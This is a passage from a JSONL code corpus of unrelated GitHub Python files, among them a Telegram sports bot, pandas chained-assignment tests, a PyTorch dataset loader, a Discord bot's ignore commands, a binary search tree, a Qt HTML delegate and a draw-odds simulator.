will provide his team\")\r\n user_to_state.put_or_update(user_id, {\"is_sent_welcome\": True, \"is_chosen_football\": True, \"is_chosen_basketball\": False})\r\n \r\n elif answer == \"basketball\": # the user chose basketball\r\n bot.reply_to(message, \"please provide a nba player's name, and i will provide his team\")\r\n user_to_state.put_or_update(user_id, {\"is_sent_welcome\": True, \"is_chosen_football\": False, \"is_chosen_basketball\": True})\r\n \r\n elif user_to_state.get_value(user_id)[\"is_chosen_football\"]: # the user is sending a footballer's name \r\n reply = get_footballer_team(answer)\r\n bot.reply_to(message, reply)\r\n \r\n elif user_to_state.get_value(user_id)[\"is_chosen_basketball\"]: # the user is sending a nba player's name \r\n reply = get_nba_player_team(answer)\r\n bot.reply_to(message, reply)\r\n\r\n\r\ndef get_footballer_team_test(input: str, expceted_output: str):\r\n # arrange:\r\n # nothing to do here\r\n\r\n # act:\r\n res = get_footballer_team(input).lower()\r\n \r\n # assert:\r\n assert res == expceted_output, \"problem with input \" + input + \", got \" + res + \", expected \" + expceted_output\r\n\r\nget_footballer_team_test(\"messi\", \"inter miami\")\r\n\r\n\r\ndef get_nba_player_team_test(input: str, expceted_output: str):\r\n # arrange:\r\n # nothing to do here\r\n\r\n # act:\r\n res = get_nba_player_team(input).lower()\r\n \r\n # assert:\r\n assert res == expceted_output, \"problem with input \" + input + \", got \" + res + \", expected \" + expceted_output\r\n\r\nget_nba_player_team_test(\"lebron\", \"los angeles lakers\")\r\n\r\n# keep the bot running\r\nif __name__ == '__main__':\r\n bot.polling(none_stop=True)\r\n","repo_name":"Shaigoldbourt22/telegram_sports_bot","sub_path":"sports_telegram_bot.py","file_name":"sports_telegram_bot.py","file_ext":"py","file_size_in_byte":7197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"951087466","text":"import socket\nfrom netobj import ClientRecv, ClientSend\n\nclass TerminalClient(object):\n \"\"\"Disposable client class\"\"\"\n _addr = \"\"\n _port = \"\"\n\n #Socket\n _s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n _s.settimeout(1000)\n\n #Stop variable for client\n _continueRunning = True;\n\n def __init__(self, addr=\"localhost\", port=4500):\n self._addr = addr\n self._port = port\n print(\"TerminalClient.py: Client initialised with address\", self._addr, \"and port\", self._port)\n\n def connect(self):\n print(\"TerminalClient.py: Attempting connection\")\n try:\n print(self._addr, self._port)\n self._s.connect((self._addr, self._port))\n self.run()\n return True\n except socket.error as e:\n print(e)\n print(\"Client.py: Unable to connect to server\")\n return False\n\n def run(self):\n clientRecv = ClientRecv.ClientRecv(self)\n clientRecv.start()\n clientSend = ClientSend.ClientSend(self)\n clientSend.start()\n while self._continueRunning:\n pass\n","repo_name":"SoulOfSet/PyChat","sub_path":"PyChat/netobj/TerminalClient.py","file_name":"TerminalClient.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34053848179","text":"from time import time\n\nimport os\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import offsetbox\nfrom matplotlib.colors import ListedColormap\nfrom sklearn import (manifold, datasets, decomposition, ensemble, lda,\n random_projection)\n\n\ndef load_feature(filename):\n fin = open(filename)\n _ = fin.readline()\n lines = fin.readlines()\n Xlst = []\n ylst = []\n lasttype = \"\"\n num = -1\n for line in lines:\n raw = line.split(\" \")\n vec = map(float, raw[1:])\n imgtype = raw[0].split(\"_\")[0]\n if (lasttype != imgtype):\n num += 1\n lasttype = imgtype\n Xlst.append(vec)\n ylst.append(num)\n\n X = np.array(Xlst)\n y = np.array(ylst)\n return X, y\n\n\ndef plot_embedding(X, y, title=None, shownum=False):\n# x_min, x_max = np.min(X, 0), np.max(X, 0)\n# X = (X - x_min) / (x_max - x_min)\n\n cm = plt.cm.Set1\n plt.figure()\n ax = plt.subplot(111)\n if shownum:\n for i in range(X.shape[0]):\n plt.text(X[i, 0], X[i, 1], str(y[i]),\n color=plt.cm.Set1(y[i] / 10.),\n fontdict={'weight': 'bold', 'size': 9})\n else:\n for i in range(0, 5):\n ax.scatter(X[i::5, 0], X[i::5, 1], marker='x', c=y[i::5], cmap=cm, alpha = 0.5)\n plt.xticks([]), plt.yticks([])\n if title is not None:\n plt.title(title)\n\n\ndef visualize(X, y):\n X2 = X.copy()\n X2.flat[::X.shape[1] + 1] += 0.01 # Make X invertible\n t0 = time()\n X_lda = lda.LDA(n_components=2).fit_transform(X2, y)\n plot_embedding(X_lda, y,\n \"Linear Discriminant projection (time %.2fs)\" %\n (time() - t0))\n plt.show()\n\nif __name__ == '__main__':\n X, y = load_feature(sys.argv[1])\n visualize(X, y)\n","repo_name":"YueDayu/AdvancedDataStructureProj2","sub_path":"training/Visualize/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73036096373","text":"import numpy as np\nimport pandas as pd\nfrom pandas.core import common as com\nfrom pandas import (compat, DataFrame, option_context,\n Series, MultiIndex, date_range, Timestamp)\nfrom pandas.util import testing as tm\n\n\nclass TestCaching(tm.TestCase):\n\n def test_slice_consolidate_invalidate_item_cache(self):\n\n # this is chained assignment, but will 'work'\n with option_context('chained_assignment', None):\n\n # #3970\n df = DataFrame({\"aa\": compat.lrange(5), \"bb\": [2.2] * 5})\n\n # Creates a second float block\n df[\"cc\"] = 0.0\n\n # caches a reference to the 'bb' series\n df[\"bb\"]\n\n # repr machinery triggers consolidation\n repr(df)\n\n # Assignment to wrong series\n df['bb'].iloc[0] = 0.17\n df._clear_item_cache()\n self.assertAlmostEqual(df['bb'][0], 0.17)\n\n def test_setitem_cache_updating(self):\n # GH 5424\n cont = ['one', 'two', 'three', 'four', 'five', 'six', 'seven']\n\n for do_ref in [False, False]:\n df = DataFrame({'a': cont,\n \"b\": cont[3:] + cont[:3],\n 'c': np.arange(7)})\n\n # ref the cache\n if do_ref:\n df.ix[0, \"c\"]\n\n # set it\n df.ix[7, 'c'] = 1\n\n self.assertEqual(df.ix[0, 'c'], 0.0)\n self.assertEqual(df.ix[7, 'c'], 1.0)\n\n # GH 7084\n # not updating cache on series setting with slices\n expected = DataFrame({'A': [600, 600, 600]},\n index=date_range('5/7/2014', '5/9/2014'))\n out = DataFrame({'A': [0, 0, 0]},\n index=date_range('5/7/2014', '5/9/2014'))\n df = DataFrame({'C': ['A', 'A', 'A'], 'D': [100, 200, 300]})\n\n # loop through df to update out\n six = Timestamp('5/7/2014')\n eix = Timestamp('5/9/2014')\n for ix, row in df.iterrows():\n out.loc[six:eix, row['C']] = out.loc[six:eix, row['C']] + row['D']\n\n tm.assert_frame_equal(out, expected)\n tm.assert_series_equal(out['A'], expected['A'])\n\n # try via a chain indexing\n # this actually works\n out = DataFrame({'A': [0, 0, 0]},\n index=date_range('5/7/2014', '5/9/2014'))\n for ix, row in df.iterrows():\n v = out[row['C']][six:eix] + row['D']\n out[row['C']][six:eix] = v\n\n tm.assert_frame_equal(out, expected)\n tm.assert_series_equal(out['A'], expected['A'])\n\n out = DataFrame({'A': [0, 0, 0]},\n index=date_range('5/7/2014', '5/9/2014'))\n for ix, row in df.iterrows():\n out.loc[six:eix, row['C']] += row['D']\n\n tm.assert_frame_equal(out, expected)\n tm.assert_series_equal(out['A'], expected['A'])\n\n\nclass TestChaining(tm.TestCase):\n\n def test_setitem_chained_setfault(self):\n\n # GH6026\n # setfaults under numpy 1.7.1 (ok on 1.8)\n data = ['right', 'left', 'left', 'left', 'right', 'left', 'timeout']\n mdata = ['right', 'left', 'left', 'left', 'right', 'left', 'none']\n\n df = DataFrame({'response': np.array(data)})\n mask = df.response == 'timeout'\n df.response[mask] = 'none'\n tm.assert_frame_equal(df, DataFrame({'response': mdata}))\n\n recarray = np.rec.fromarrays([data], names=['response'])\n df = DataFrame(recarray)\n mask = df.response == 'timeout'\n df.response[mask] = 'none'\n tm.assert_frame_equal(df, DataFrame({'response': mdata}))\n\n df = DataFrame({'response': data, 'response1': data})\n mask = df.response == 'timeout'\n df.response[mask] = 'none'\n tm.assert_frame_equal(df, DataFrame({'response': mdata,\n 'response1': data}))\n\n # GH 6056\n expected = DataFrame(dict(A=[np.nan, 'bar', 'bah', 'foo', 'bar']))\n df = DataFrame(dict(A=np.array(['foo', 'bar', 'bah', 'foo', 'bar'])))\n df['A'].iloc[0] = np.nan\n result = df.head()\n tm.assert_frame_equal(result, expected)\n\n df = DataFrame(dict(A=np.array(['foo', 'bar', 'bah', 'foo', 'bar'])))\n df.A.iloc[0] = np.nan\n result = df.head()\n tm.assert_frame_equal(result, expected)\n\n def test_detect_chained_assignment(self):\n\n pd.set_option('chained_assignment', 'raise')\n\n # work with the chain\n expected = DataFrame([[-5, 1], [-6, 3]], columns=list('AB'))\n df = DataFrame(np.arange(4).reshape(2, 2),\n columns=list('AB'), dtype='int64')\n self.assertIsNone(df.is_copy)\n df['A'][0] = -5\n df['A'][1] = -6\n tm.assert_frame_equal(df, expected)\n\n # test with the chaining\n df = DataFrame({'A': Series(range(2), dtype='int64'),\n 'B': np.array(np.arange(2, 4), dtype=np.float64)})\n self.assertIsNone(df.is_copy)\n\n def f():\n df['A'][0] = -5\n\n self.assertRaises(com.SettingWithCopyError, f)\n\n def f():\n df['A'][1] = np.nan\n\n self.assertRaises(com.SettingWithCopyError, f)\n self.assertIsNone(df['A'].is_copy)\n\n # using a copy (the chain), fails\n df = DataFrame({'A': Series(range(2), dtype='int64'),\n 'B': np.array(np.arange(2, 4), dtype=np.float64)})\n\n def f():\n df.loc[0]['A'] = -5\n\n self.assertRaises(com.SettingWithCopyError, f)\n\n # doc example\n df = DataFrame({'a': ['one', 'one', 'two', 'three',\n 'two', 'one', 'six'],\n 'c': Series(range(7), dtype='int64')})\n self.assertIsNone(df.is_copy)\n expected = DataFrame({'a': ['one', 'one', 'two', 'three',\n 'two', 'one', 'six'],\n 'c': [42, 42, 2, 3, 4, 42, 6]})\n\n def f():\n indexer = df.a.str.startswith('o')\n df[indexer]['c'] = 42\n\n self.assertRaises(com.SettingWithCopyError, f)\n\n expected = DataFrame({'A': [111, 'bbb', 'ccc'], 'B': [1, 2, 3]})\n df = DataFrame({'A': ['aaa', 'bbb', 'ccc'], 'B': [1, 2, 3]})\n\n def f():\n df['A'][0] = 111\n\n self.assertRaises(com.SettingWithCopyError, f)\n\n def f():\n df.loc[0]['A'] = 111\n\n self.assertRaises(com.SettingWithCopyError, f)\n\n df.loc[0, 'A'] = 111\n tm.assert_frame_equal(df, expected)\n\n # make sure that is_copy is picked up reconstruction\n # GH5475\n df = DataFrame({\"A\": [1, 2]})\n self.assertIsNone(df.is_copy)\n with tm.ensure_clean('__tmp__pickle') as path:\n df.to_pickle(path)\n df2 = pd.read_pickle(path)\n df2[\"B\"] = df2[\"A\"]\n df2[\"B\"] = df2[\"A\"]\n\n # a suprious raise as we are setting the entire column here\n # GH5597\n from string import ascii_letters as letters\n\n def random_text(nobs=100):\n df = []\n for i in range(nobs):\n idx = np.random.randint(len(letters), size=2)\n idx.sort()\n df.append([letters[idx[0]:idx[1]]])\n\n return DataFrame(df, columns=['letters'])\n\n df = random_text(100000)\n\n # always a copy\n x = df.iloc[[0, 1, 2]]\n self.assertIsNotNone(x.is_copy)\n x = df.iloc[[0, 1, 2, 4]]\n self.assertIsNotNone(x.is_copy)\n\n # explicity copy\n indexer = df.letters.apply(lambda x: len(x) > 10)\n df = df.ix[indexer].copy()\n self.assertIsNone(df.is_copy)\n df['letters'] = df['letters'].apply(str.lower)\n\n # implicity take\n df = random_text(100000)\n indexer = df.letters.apply(lambda x: len(x) > 10)\n df = df.ix[indexer]\n self.assertIsNotNone(df.is_copy)\n df['letters'] = df['letters'].apply(str.lower)\n\n # implicity take 2\n df = random_text(100000)\n indexer = df.letters.apply(lambda x: len(x) > 10)\n df = df.ix[indexer]\n self.assertIsNotNone(df.is_copy)\n df.loc[:, 'letters'] = df['letters'].apply(str.lower)\n\n # should be ok even though it's a copy!\n self.assertIsNone(df.is_copy)\n df['letters'] = df['letters'].apply(str.lower)\n self.assertIsNone(df.is_copy)\n\n df = random_text(100000)\n indexer = df.letters.apply(lambda x: len(x) > 10)\n df.ix[indexer, 'letters'] = df.ix[indexer, 'letters'].apply(str.lower)\n\n # an identical take, so no copy\n df = DataFrame({'a': [1]}).dropna()\n self.assertIsNone(df.is_copy)\n df['a'] += 1\n\n # inplace ops\n # original from:\n # http://stackoverflow.com/questions/20508968/series-fillna-in-a-multiindex-dataframe-does-not-fill-is-this-a-bug\n a = [12, 23]\n b = [123, None]\n c = [1234, 2345]\n d = [12345, 23456]\n tuples = [('eyes', 'left'), ('eyes', 'right'), ('ears', 'left'),\n ('ears', 'right')]\n events = {('eyes', 'left'): a,\n ('eyes', 'right'): b,\n ('ears', 'left'): c,\n ('ears', 'right'): d}\n multiind = MultiIndex.from_tuples(tuples, names=['part', 'side'])\n zed = DataFrame(events, index=['a', 'b'], columns=multiind)\n\n def f():\n zed['eyes']['right'].fillna(value=555, inplace=True)\n\n self.assertRaises(com.SettingWithCopyError, f)\n\n df = DataFrame(np.random.randn(10, 4))\n s = df.iloc[:, 0].sort_values()\n tm.assert_series_equal(s, df.iloc[:, 0].sort_values())\n tm.assert_series_equal(s, df[0].sort_values())\n\n # false positives GH6025\n df = DataFrame({'column1': ['a', 'a', 'a'], 'column2': [4, 8, 9]})\n str(df)\n df['column1'] = df['column1'] + 'b'\n str(df)\n df = df[df['column2'] != 8]\n str(df)\n df['column1'] = df['column1'] + 'c'\n str(df)\n\n # from SO:\n # http://stackoverflow.com/questions/24054495/potential-bug-setting-value-for-undefined-column-using-iloc\n df = DataFrame(np.arange(0, 9), columns=['count'])\n df['group'] = 'b'\n\n def f():\n df.iloc[0:5]['group'] = 'a'\n\n self.assertRaises(com.SettingWithCopyError, f)\n\n # mixed type setting\n # same dtype & changing dtype\n df = DataFrame(dict(A=date_range('20130101', periods=5),\n B=np.random.randn(5),\n C=np.arange(5, dtype='int64'),\n D=list('abcde')))\n\n def f():\n df.ix[2]['D'] = 'foo'\n\n self.assertRaises(com.SettingWithCopyError, f)\n\n def f():\n df.ix[2]['C'] = 'foo'\n\n self.assertRaises(com.SettingWithCopyError, f)\n\n def f():\n df['C'][2] = 'foo'\n\n self.assertRaises(com.SettingWithCopyError, f)\n\n def test_setting_with_copy_bug(self):\n\n # operating on a copy\n df = pd.DataFrame({'a': list(range(4)),\n 'b': list('ab..'),\n 'c': ['a', 'b', np.nan, 'd']})\n mask = pd.isnull(df.c)\n\n def f():\n df[['c']][mask] = df[['b']][mask]\n\n self.assertRaises(com.SettingWithCopyError, f)\n\n # invalid warning as we are returning a new object\n # GH 8730\n df1 = DataFrame({'x': Series(['a', 'b', 'c']),\n 'y': Series(['d', 'e', 'f'])})\n df2 = df1[['x']]\n\n # this should not raise\n df2['y'] = ['g', 'h', 'i']\n\n def test_detect_chained_assignment_warnings(self):\n\n # warnings\n with option_context('chained_assignment', 'warn'):\n df = DataFrame({'A': ['aaa', 'bbb', 'ccc'], 'B': [1, 2, 3]})\n with tm.assert_produces_warning(\n expected_warning=com.SettingWithCopyWarning):\n df.loc[0]['A'] = 111\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/pandas-dev_pandas/pandas-master/pandas/tests/indexing/test_chaining_and_caching.py","file_name":"test_chaining_and_caching.py","file_ext":"py","file_size_in_byte":11981,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"41115786901","text":"\nimport importlib\nimport torch.utils.data\nfrom data.base_dataset import BaseDataset\n\n\ndef find_dataset_using_name(dataset_name):\n dataset_filename = \"data.\" + dataset_name + \"_dataset\"\n datasetlib = importlib.import_module(dataset_filename)\n\n dataset = None\n target_dataset_name = dataset_name.replace('_', '') + 'dataset'\n for name, cls in datasetlib.__dict__.items():\n if name.lower() == target_dataset_name.lower() \\\n and issubclass(cls, BaseDataset):\n dataset = cls\n\n if dataset is None:\n raise NotImplementedError(\"In %s.py, there should be a subclass of BaseDataset with class name that matches %s in lowercase.\" % (dataset_filename, target_dataset_name))\n\n return dataset\n\n\ndef get_option_setter(dataset_name):\n dataset_class = find_dataset_using_name(dataset_name)\n return dataset_class.modify_commandline_options\n\ndef create_dataset_to_iid(opt, aug_data, dataType = 'train',batch_size = 256):\n data_loader = CustomDatasetIIDDataLoader(opt, aug_data, dataType, batch_size)\n dataset = data_loader.load_data()\n return dataset\n\n\n\ndef create_dataset(opt,dataType = 'train',batch_size = 256):\n data_loader = CustomDatasetDataLoader(opt,dataType,batch_size)\n dataset = data_loader.load_data()\n return dataset\n\nclass CustomDatasetIIDDataLoader():\n def __init__(self, opt,aug_data,dataType,batch_size):\n self.opt = opt\n dataset_class = find_dataset_using_name(opt.dataset_fuse_mode)\n self.dataset = dataset_class(opt, aug_data,dataType)\n print(\"dataset [%s] was created\" % type(self.dataset).__name__)\n self.dataloader = torch.utils.data.DataLoader(\n self.dataset,\n batch_size=batch_size,\n shuffle=not opt.serial_batches,\n num_workers=int(opt.num_threads),\n drop_last=True)\n\n def load_data(self):\n return self\n\n def __len__(self):\n return min(len(self.dataset), self.opt.max_dataset_size)\n\n def __iter__(self):\n \"\"\"Return a batch of data\"\"\"\n for i, data in enumerate(self.dataloader):\n if i * self.opt.batch_size >= self.opt.max_dataset_size:\n break\n yield data\n\nclass CustomDatasetDataLoader():\n\n def __init__(self, opt,dataType,batch_size):\n self.opt = opt\n dataset_class = find_dataset_using_name(opt.dataset_mode)\n self.dataset = dataset_class(opt,dataType)\n print(\"dataset [%s] was created\" % type(self.dataset).__name__)\n self.dataloader = torch.utils.data.DataLoader(\n self.dataset,\n batch_size=batch_size,\n shuffle=not opt.serial_batches,\n num_workers=int(opt.num_threads),\n drop_last=True)\n\n def load_data(self):\n return self\n\n def __len__(self):\n return min(len(self.dataset), self.opt.max_dataset_size)\n\n\n def __iter__(self):\n for i, data in enumerate(self.dataloader):\n if i * self.opt.batch_size >= self.opt.max_dataset_size:\n break\n yield data\n","repo_name":"Sheng-T/FedMGD","sub_path":"data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"21"} +{"seq_id":"41129554412","text":"#!/usr/bin/env python\n\"\"\"Django's command-line utility for administrative tasks.\"\"\"\nimport os\nimport sys\nfrom elasticsearch import Elasticsearch, ElasticsearchException\nimport time\n\n\ndef make_index():\n es = Elasticsearch(\"elasticsearch:9200\")\n index = \"earthquake\"\n time.sleep(15)\n while True:\n flag = es.ping()\n if flag:\n print(flag)\n break\n else:\n print(\"API2 is wating for DB...\")\n time.sleep(5)\n\n time.sleep(5)\n exist = es.indices.exists(\"earthquake\")\n if not exist:\n es.index(index=\"earthquake\", body={\"id\": \"dummy\"})\n # es.create(index=\"earthquake\")\n # es.indices()\n\n\ndef main():\n \"\"\"Run administrative tasks.\"\"\"\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'api2.settings')\n try:\n from django.core.management import execute_from_command_line\n except ImportError as exc:\n raise ImportError(\n \"Couldn't import Django. Are you sure it's installed and \"\n \"available on your PYTHONPATH environment variable? Did you \"\n \"forget to activate a virtual environment?\"\n ) from exc\n execute_from_command_line(sys.argv)\n\n\nif __name__ == '__main__':\n make_index()\n main()\n","repo_name":"thisishoon/backend-engineering","sub_path":"api2/api2/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31134517698","text":"import discord\nimport pickledb\nfrom datetime import *\nfrom otherdave.util import config, constants\n\nignoreDb = pickledb.load(\"./data/ignore.db\", True)\nslideDb = pickledb.load(\"./data/slide.db\", True)\n\ndef ignore(interaction: discord.Interaction, user: discord.Member, mins: int) -> str:\n ignoreTime = datetime.now() + timedelta(minutes=mins)\n\n if (interaction.user.id == user.id):\n ignoreDb.set(str(user.id), ignoreTime.isoformat())\n return config.emotions[\"_zipit\"]\n else:\n author = interaction.user.name\n if (author != \"Isaac\" and author != \"MercWorks\"):\n return \"Mama Mia! Only Dave can do that!\"\n\n ignoreDb.set(user.id, ignoreTime.isoformat())\n return f\"Got it, I'll ignore {user.mention} for {mins} minutes. They must have been *naughty!*\"\n\ndef ignoreBandit(mins: int) -> str:\n bandit = \"442747712400654337\"\n ignoreTime = datetime.now() + timedelta(minutes=mins)\n ignoreDb.set(bandit, ignoreTime.isoformat())\n return f\"Got it, I'll ignore <@!{bandit}> for {mins} minutes. They must have been *naughty!*\"\n\ndef dms(userId: int, flag: str) -> str:\n userId = str(userId)\n if (flag == \"enable\"):\n if (slideDb.get(userId)):\n slideDb.rem(userId)\n return \"Got it, I'll be sliding into those dms sometime soon.\"\n elif (flag == \"disable\"):\n slideDb.set(userId, True)\n return \"Okay, I won't send you any direct messages.\"\n else:\n return constants.dmsUsage\n\ndef callerNotIgnored(interaction: discord.Interaction) -> bool:\n return not shouldIgnore(interaction.user.id)\n\ndef shouldIgnore(userId: int) -> bool:\n userId = str(userId)\n timeStr = ignoreDb.get(userId)\n if (timeStr):\n ignoreTime = datetime.fromisoformat(timeStr)\n if (datetime.now() > ignoreTime):\n ignoreDb.rem(userId)\n return False\n return True\n return False\n\ndef canDm(userId: int) -> bool:\n userId = str(userId)\n return slideDb.get(userId) != True","repo_name":"ibanner56/OtherDave","sub_path":"otherdave/commands/ignore.py","file_name":"ignore.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14090392473","text":"from pyDSAlgo.DS import PyDS\n\n\nclass Node:\n def __init__(self, key):\n self.key = key\n self.left = None\n self.right = None\n\n\nclass PyBinarySearchTree(PyDS):\n def __init__(self):\n super().__init__()\n self.root = None\n\n def insert(self, key):\n self.root = self._insert_recursive(self.root, key)\n\n def _insert_recursive(self, root, key):\n if root is None:\n return Node(key)\n if key < root.key:\n root.left = self._insert_recursive(root.left, key)\n else:\n root.right = self._insert_recursive(root.right, key)\n return root\n\n def search(self, key):\n return self._search_recursive(self.root, key)\n\n def _search_recursive(self, root, key):\n if root is None or root.key == key:\n return root\n if key < root.key:\n return self._search_recursive(root.left, key)\n else:\n return self._search_recursive(root.right, key)\n\n def delete(self, key):\n self.root = self._delete_recursive(self.root, key)\n\n def _delete_recursive(self, root, key):\n if root is None:\n return root\n if key < root.key:\n root.left = self._delete_recursive(root.left, key)\n elif key > root.key:\n root.right = self._delete_recursive(root.right, key)\n else:\n if root.left is None:\n return root.right\n elif root.right is None:\n return root.left\n root.key = self._get_min_value(root.right)\n root.right = self._delete_recursive(root.right, root.key)\n return root\n\n @staticmethod\n def _get_min_value(root):\n current = root\n while current.left is not None:\n current = current.left\n return current.key\n\n def inorder_traversal(self):\n self._inorder_recursive(self.root)\n\n def _inorder_recursive(self, root):\n if root is not None:\n self._inorder_recursive(root.left)\n print(root.key, end=\" \")\n self._inorder_recursive(root.right)\n","repo_name":"sattyamjjain/pyDSAlgo","sub_path":"pyDSAlgo/DS/Tree/PyBinarySearchTree.py","file_name":"PyBinarySearchTree.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25810671355","text":"\"\"\"\nhtmldelegate --- QStyledItemDelegate delegate. Draws HTML\n=========================================================\n\"\"\"\n\nfrom PyQt5.QtWidgets import QApplication, \\\n QStyledItemDelegate, QStyle, QStyleOptionViewItem, \\\n QWidget\nfrom PyQt5.QtGui import QAbstractTextDocumentLayout, \\\n QTextDocument, QPalette\nfrom PyQt5.QtCore import QSize\n\n\n_HTML_ESCAPE_TABLE = \\\n {\n \"&\": \"&\",\n '\"': \""\",\n \"'\": \"'\",\n \">\": \">\",\n \"<\": \"<\",\n \" \": \" \",\n \"\\t\": \"    \",\n }\n\n\ndef htmlEscape(text):\n \"\"\"Replace special HTML symbols with escase sequences\n \"\"\"\n return \"\".join(_HTML_ESCAPE_TABLE.get(c, c) for c in text)\n\n\nclass HTMLDelegate(QStyledItemDelegate):\n \"\"\"QStyledItemDelegate implementation. Draws HTML\n\n http://stackoverflow.com/questions/1956542/how-to-make-item-view-render-rich-html-text-in-qt/1956781#1956781\n \"\"\"\n\n def __init__(self, parent=None):\n if isinstance(parent, QWidget):\n self._font = parent.font()\n else:\n self._font = None\n\n QStyledItemDelegate.__init__(self, parent)\n\n def paint(self, painter, option, index):\n \"\"\"QStyledItemDelegate.paint implementation\n \"\"\"\n option.state &= ~QStyle.State_HasFocus # never draw focus rect\n\n option.state |= QStyle.State_Active # draw fuzzy-open completion as focused, even if focus is on the line edit\n\n options = QStyleOptionViewItem(option)\n self.initStyleOption(options, index)\n\n style = QApplication.style() if options.widget is None else options.widget.style()\n\n doc = QTextDocument()\n if self._font is not None:\n doc.setDefaultFont(self._font)\n\n doc.setDocumentMargin(1)\n doc.setHtml(options.text)\n # bad long (multiline) strings processing doc.setTextWidth(options.rect.width())\n\n options.text = \"\"\n style.drawControl(QStyle.CE_ItemViewItem, options, painter)\n\n ctx = QAbstractTextDocumentLayout.PaintContext()\n\n # Highlighting text if item is selected\n if option.state & QStyle.State_Selected:\n ctx.palette.setColor(QPalette.Text,\n option.palette.color(QPalette.Active, QPalette.Text))\n\n textRect = style.subElementRect(QStyle.SE_ItemViewItemText, options)\n painter.save()\n painter.translate(textRect.topLeft())\n painter.setClipRect(textRect.translated(-textRect.topLeft()))\n doc.documentLayout().draw(painter, ctx)\n\n painter.restore()\n\n def sizeHint(self, option, index):\n \"\"\"QStyledItemDelegate.sizeHint implementation\n \"\"\"\n options = QStyleOptionViewItem(option)\n self.initStyleOption(options, index)\n\n doc = QTextDocument()\n if self._font is not None:\n doc.setDefaultFont(self._font)\n doc.setDocumentMargin(1)\n # bad long (multiline) strings processing doc.setTextWidth(options.rect.width())\n doc.setHtml(options.text)\n return QSize(doc.idealWidth(), doc.size().height())\n","repo_name":"andreikop/enki","sub_path":"enki/lib/htmldelegate.py","file_name":"htmldelegate.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"21"} +{"seq_id":"3398059590","text":"# This file determines draw odds by performing a mock drawing for various scenarios\nimport random\n\n\nclass ApplicantNode:\n \"\"\"A node for the linked list. The node contains the point category and the adjusted number of applicants for\n that point cat (after accounting for point squaring).\"\"\"\n\n def __init__(self, app_id: int, point_val: int):\n self.app_id = app_id\n self.point_val = point_val\n\n if self.point_val == 0:\n self.apps = 1\n else:\n self.apps = (self.point_val ** 2)\n\n\nclass AppBag:\n \"\"\"A data structure that represents a random bag of applicants.\"\"\"\n\n def __init__(self):\n self.bag = []\n self.size = 0\n\n def add_to_bag(self, applicant: ApplicantNode):\n \"\"\"Adds an applicant to the bag. NOTE - bag must be randomized by calling randomize_bag after adding all\n applicants to the bag.\"\"\"\n self.bag.append(applicant)\n self.size += 1\n\n def randomize_bag(self):\n \"\"\"Randomizes the applicants in the bag.\"\"\"\n # loop through the bag list, for every index create a new random index between 0 and list length. Swap the\n # current element with the random index.\n random.seed()\n for curr_index in range(self.size):\n rand_index = random.randint(0, self.size - 1)\n curr_applicant = self.bag[curr_index]\n swap_applicant = self.bag[rand_index]\n self.bag[rand_index] = curr_applicant\n self.bag[curr_index] = swap_applicant\n\n def draw_from_bag(self, index: int):\n \"\"\"Returns an applicant ID from the bag. Index should be randomized when drawing from the bag to have a\n true random draw.\"\"\"\n return self.bag[index]\n\n\ndef analyze_trends(app_array: list):\n \"\"\"This function requires a 2D array with rows acting as years and columns acting as point values. The numbers in\n the 2D array must be the number of applications in that point category. The function analyzes the trends and\n determines what next years drawing might look like. It returns a list (with columns as point cats) with the\n anticipated number of applicants for that point category in the next year.\"\"\"\n pass\n\n\nclass DrawSimul:\n\n def __init__(self, expected_apps: list, tag: str, num_tags: int):\n self.tag = tag\n self.num_tags = num_tags\n self.expected_apps = expected_apps\n\n # attribute to throw the applicant IDs into for the random drawing\n self.apps_bag = AppBag()\n\n # attribute to hold what IDs have been drawn from the bag already so we don't double draw\n self.draw_ids = set()\n\n # attribute to hold the results of the dwgs (number of applicants selected in each point cat)\n self.dwg_results = [0]*21\n\n def draw_rand_id(self):\n \"\"\"Draws a random ID from the apps_bag. Keeps drawing until an ID that hasn't been drawn gets drawn.\"\"\"\n random.seed()\n rand_index = random.randint(0, self.apps_bag.size - 1)\n rand_applicant = self.apps_bag.draw_from_bag(rand_index)\n\n if rand_applicant.app_id in self.draw_ids:\n return self.draw_rand_id()\n\n self.dwg_results[rand_applicant.point_val] += 1\n self.draw_ids.add(rand_applicant.app_id)\n\n def add_applicants_to_bag(self):\n \"\"\"Adds all of the applicants to the bag for drawing.\"\"\"\n app_id = 0\n for i, applicants in enumerate(self.expected_apps):\n for app in range(applicants):\n new_app = ApplicantNode(app_id, i)\n while new_app.apps > 0:\n self.apps_bag.add_to_bag(new_app)\n new_app.apps -= 1\n app_id += 1\n\n for i in range(2):\n self.apps_bag.randomize_bag()\n\n def run_drawing(self):\n \"\"\"performs a drawing\"\"\"\n # add all the applicants to the bag\n self.add_applicants_to_bag()\n\n # draw random applicants from the bag until you hit the number of tags\n # NOTE - self.draw_rand_id retries automatically if you re-draw a certain person\n for _ in range(self.num_tags):\n self.draw_rand_id()\n\n return 